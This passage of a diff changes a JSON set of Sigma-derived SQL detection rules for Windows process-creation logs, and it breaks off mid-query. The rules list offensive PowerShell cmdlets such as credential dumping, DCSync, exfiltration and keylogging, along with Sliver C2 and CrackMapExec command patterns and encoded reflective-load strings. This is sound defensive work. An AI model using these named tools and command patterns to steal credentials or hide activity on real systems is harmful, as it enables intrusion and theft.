ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", + "attack.defense_evasion", "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "status": "test", + "description": "Detects commands that temporarily turn off Volume Snapshots", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' 